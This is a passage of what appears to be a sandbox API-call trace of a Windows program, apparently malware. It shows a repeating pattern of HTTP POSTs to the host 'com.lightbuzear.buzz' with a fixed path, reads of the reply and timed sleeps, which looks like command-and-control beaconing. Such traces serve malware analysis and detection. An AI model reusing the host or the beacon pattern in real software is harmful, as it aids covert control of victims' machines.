dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0276.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb40 | out: hHeap=0x4780000) returned 1 [0276.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0276.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0276.819] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0276.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0276.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0276.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0276.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f128 [0276.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1b8 [0276.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f128 | out: hHeap=0x4780000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0276.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1b8 | out: hHeap=0x4780000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be910 [0276.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0276.820] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be910 | out: hHeap=0x4780000) returned 1 [0276.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bea50 [0276.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0276.820] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be910 [0276.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0276.821] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0276.821] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0276.821] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0277.972] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be910 | out: hHeap=0x4780000) returned 1 [0277.972] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0277.972] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0277.973] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0277.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0277.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6c0 [0277.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0277.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0277.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0277.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6f0 [0277.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0277.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0277.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0277.973] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0f8 [0277.973] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0277.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0b0 [0277.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0f8 | out: hHeap=0x4780000) returned 1 [0277.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0277.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0b0 | out: hHeap=0x4780000) returned 1 [0277.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be910 [0277.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0277.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe48 [0277.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be910 | out: hHeap=0x4780000) returned 1 [0277.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb40 [0277.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0277.974] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be910 [0277.974] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0277.975] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0277.975] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0277.975] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0277.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be910 | out: hHeap=0x4780000) returned 1 [0277.976] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0277.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0277.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0277.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0277.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0277.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0277.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0277.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0277.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0277.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0277.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f188 [0277.976] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0277.976] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0b0 [0277.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f188 | out: hHeap=0x4780000) returned 1 [0277.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0277.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0b0 | out: hHeap=0x4780000) returned 1 [0277.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bea00 [0277.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0277.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0277.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea00 | out: hHeap=0x4780000) returned 1 [0277.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be910 [0277.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0277.977] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0277.977] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0277.978] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0277.978] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0277.978] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0277.978] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0277.978] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0277.979] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0277.979] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0277.979] FreeLibrary (hLibModule=0x71570000) returned 1 [0277.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0277.979] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0277.980] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0277.980] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec30 | out: hHeap=0x4780000) returned 1 [0277.980] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be9b0 | out: hHeap=0x4780000) returned 1 [0277.980] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be848 | out: hHeap=0x4780000) returned 1 [0277.981] Sleep (dwMilliseconds=0x2710) [0278.012] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0278.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0278.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0278.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0278.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0278.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0278.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0278.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0278.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0278.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ef60 [0278.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0278.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480ed98 [0278.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ef60 | out: hHeap=0x4780000) returned 1 [0278.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0278.013] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed98 | out: hHeap=0x4780000) returned 1 [0278.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480ef60 [0278.013] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0278.014] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0278.014] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0278.014] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0278.014] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0278.014] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0278.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0278.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0278.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0278.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0278.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0278.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0278.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0278.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0278.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480ed98 [0278.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0278.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480edb0 [0278.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480ed98 | out: hHeap=0x4780000) returned 1 [0278.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0278.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0278.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bec30 [0278.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0278.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0278.015] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bec30 | out: hHeap=0x4780000) returned 1 [0278.015] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be9b0 [0278.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0278.016] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8e8 [0278.016] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0278.017] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0278.017] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0278.017] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0278.017] FreeLibrary (hLibModule=0x71780000) returned 1 [0278.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0278.018] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0278.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be848 [0278.018] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0278.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0278.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0278.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0278.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5b0 [0278.018] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0278.018] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0278.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0278.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0278.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0278.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480edb0 [0278.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0278.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f0c8 [0278.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480edb0 | out: hHeap=0x4780000) returned 1 [0278.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0278.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0278.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f0f8 [0278.019] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8e8 [0278.019] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0278.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0278.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8e8 [0278.020] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0278.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bec30 [0278.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0278.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce670 [0278.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0278.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0278.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0278.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0278.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0278.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0278.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0278.020] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f158 [0278.020] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0278.021] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f200 [0278.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f158 | out: hHeap=0x4780000) returned 1 [0278.021] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0278.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f200 | out: hHeap=0x4780000) returned 1 [0278.021] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f230 [0278.021] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be938 [0278.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be938 | out: hHeap=0x4780000) returned 1 [0278.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0278.021] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0278.021] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0278.021] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0278.021] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0278.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0278.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0278.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f170 [0278.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1a0 [0278.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f170 | out: hHeap=0x4780000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0278.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1a0 | out: hHeap=0x4780000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be938 [0278.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0278.022] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be938 | out: hHeap=0x4780000) returned 1 [0278.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be938 [0278.022] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0278.023] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bea00 [0278.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0278.023] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0278.023] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0278.023] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0278.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea00 | out: hHeap=0x4780000) returned 1 [0278.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0278.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0278.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0278.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0278.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0278.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0278.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0278.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0278.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0278.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f110 [0278.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0278.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1e8 [0278.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f110 | out: hHeap=0x4780000) returned 1 [0278.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0278.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1e8 | out: hHeap=0x4780000) returned 1 [0278.024] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bea00 [0278.024] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0278.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0278.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bea00 | out: hHeap=0x4780000) returned 1 [0278.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bea00 [0278.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0278.025] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bea28 [0278.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0278.025] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) 